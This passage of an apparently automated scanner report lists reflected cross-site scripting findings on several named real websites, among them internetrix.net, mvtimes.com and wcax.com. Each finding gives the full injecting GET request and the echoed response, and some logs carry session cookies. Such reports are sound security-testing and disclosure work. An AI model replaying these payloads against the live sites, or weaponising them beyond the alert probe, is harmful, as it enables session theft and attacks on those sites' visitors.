Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.2.10.1302308294

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:49 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pagec3392"><script>alert(1)</script>03fc8cb16ef/contact-us">
...[SNIP]...

1.134. http://www.internetrix.net/page/contact-us/jobs-at-internetrix/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/contact-us/jobs-at-internetrix/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29490"><script>alert(1)</script>5d04903db96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page29490"><script>alert(1)</script>5d04903db96/contact-us/jobs-at-internetrix/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:57 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page29490"><script>alert(1)</script>5d04903db96/contact-us/jobs-at-internetrix">
...[SNIP]...

1.135. http://www.internetrix.net/page/events/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/events/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44922"><script>alert(1)</script>5a4c4169ffa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page44922"><script>alert(1)</script>5a4c4169ffa/events/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:48 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page44922"><script>alert(1)</script>5a4c4169ffa/events">
...[SNIP]...

1.136. http://www.internetrix.net/page/products/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/products/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4474e"><script>alert(1)</script>dae382dfee4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page4474e"><script>alert(1)</script>dae382dfee4/products/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/articles/latest-news/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.9.10.1302308294

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:25:29 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page4474e"><script>alert(1)</script>dae382dfee4/products">
...[SNIP]...

1.137. http://www.mvtimes.com/marthas-vineyard/article.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/article.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e10a1"><script>alert(1)</script>06dfa831a6f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/article.php?id=4030e10a1"><script>alert(1)</script>06dfa831a6f HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/directory/?a=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=340f9a2f4e744e94e83d808165edd48d; __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.5.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:17:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 25573

A database error occurredA database error occurredA database error occurred<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="ht
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/article.php?id=4030e10a1"><script>alert(1)</script>06dfa831a6f">
...[SNIP]...

1.138. http://www.mvtimes.com/marthas-vineyard/article.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/article.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98c05"><script>alert(1)</script>730302c3221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/article.php?id=4030&98c05"><script>alert(1)</script>730302c3221=1 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/directory/?a=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=340f9a2f4e744e94e83d808165edd48d; __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.5.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:17:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 31188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/article.php?id=4030&98c05"><script>alert(1)</script>730302c3221=1">
...[SNIP]...

1.139. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302e4"><script>alert(1)</script>2c94143d614 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/classifieds/110.php/%22onmouseover302e4"><script>alert(1)</script>2c94143d614=prompt(945581)%3E HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:15:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 29379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover302e4"><script>alert(1)</script>2c94143d614=prompt(945581)%3E">
...[SNIP]...

1.140. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e1ab"><script>alert(1)</script>bf94dc26cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E?6e1ab"><script>alert(1)</script>bf94dc26cb6=1 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:15:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 29354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E?6e1ab"><script>alert(1)</script>bf94dc26cb6=1">
...[SNIP]...

1.141. http://www.wcax.com/Global/link.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/link.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae67'-alert(1)-'3ecbfdbef18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Global/link.asp?L=408799&1ae67'-alert(1)-'3ecbfdbef18=1 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352293178:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS10
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
ntCoent-Length: 26061
Cache-Control: private, max-age=300
Expires: Sat, 09 Apr 2011 12:39:03 GMT
Date: Sat, 09 Apr 2011 12:34:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 26061

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>WCAX Vermo
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','http://www.vermontopia.com/event/?L=408799&1ae67'-alert(1)-'3ecbfdbef18=1&referrerDomain=www.wcax.com');
</script>
...[SNIP]...

1.142. http://www.wcax.com/global/interface/httprequest/hrproxy.asp [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wcax.com
Path:   /global/interface/httprequest/hrproxy.asp

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c6a9e<a>86d1ec594e was submitted in the url parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /global/interface/httprequest/hrproxy.asp?url=http%3A%2F%2Fwp.myweather.net%2Fwxdata%2Ffiveday.asp%3Fpub%3Dwdnw%26s%3Dkbtvc6a9e<a>86d1ec594e&rand=98263 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352451310:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS54
P3P: CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/xml; charset=utf-8
ntCoent-Length: 93
Cache-Control: private, max-age=277
Date: Sat, 09 Apr 2011 12:34:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 93

<?xml version="1.0"?>
<!-- 200 - fiveday: KBTVC6A9E<A>86D1EC594E not found
--><datamissing/>

1.143. http://www.wcax.com/global/link.asp [function parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/link.asp

Issue detail

The value of the function request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38f44'-alert(1)-'4014e68a00c was submitted in the function parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/link.asp?L=104054&function=manageprofile38f44'-alert(1)-'4014e68a00c&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352689361:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS07
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 25813
Cache-Control: private, max-age=843
Date: Sat, 09 Apr 2011 12:38:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25813

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Registrati
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','/global/PM/registration.asp?L=104054&function=manageprofile38f44'-alert(1)-'4014e68a00c&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823&referrerDomain=www.wcax.com');
</script>
...[SNIP]...

1.144. http://www.wcax.com/global/link.asp [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/link.asp

Issue detail

The value of the mode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a495'-alert(1)-'4b87acb98b2 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/link.asp?L=104054&function=manageprofile&mode=create3a495'-alert(1)-'4b87acb98b2&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352689361:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis06
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 25813
Cache-Control: private, max-age=900
Date: Sat, 09 Apr 2011 12:38:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25813

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Registrati
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','/global/PM/registration.asp?L=104054&function=manageprofile&mode=create3a495'-alert(1)-'4b87acb98b2&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823&referrerDomain=www.wcax.com');
</script>
...[SNIP]...

1.145. http://www.wcax.com/global/link.asp [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/link.asp

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fdd3'-alert(1)-'cdf0dafd5c5 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/link.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D3988238fdd3'-alert(1)-'cdf0dafd5c5 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352689361:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS10
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 25809
Cache-Control: private, max-age=886
Date: Sat, 09 Apr 2011 12:38:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25809

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Registrati
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','/global/PM/registration.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D3988238fdd3'-alert(1)-'cdf0dafd5c5&referrerDomain=www.wcax.com');
</script>
...[SNIP]...

1.146. http://y.cdn.adblade.com/imps.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://y.cdn.adblade.com
Path:   /imps.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7246"><script>alert(1)</script>f269b65bb7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,&e7246"><script>alert(1)</script>f269b65bb7d=1 HTTP/1.1
Host: y.cdn.adblade.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-type: text/html
Date: Mon, 11 Apr 2011 17:41:22 GMT
Expires: Mon, 11 Apr 2011 17:41:22 GMT
